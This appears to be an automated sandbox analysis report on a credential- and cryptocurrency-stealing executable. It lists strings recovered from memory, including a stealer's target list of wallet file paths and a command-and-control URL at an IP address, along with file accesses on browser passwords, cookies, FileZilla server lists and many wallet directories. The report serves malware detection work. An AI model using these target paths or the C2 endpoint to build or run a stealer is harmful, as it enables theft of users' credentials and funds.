Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpge\multidoge.wallet.*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpdus.wallet\\seed.seco2
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

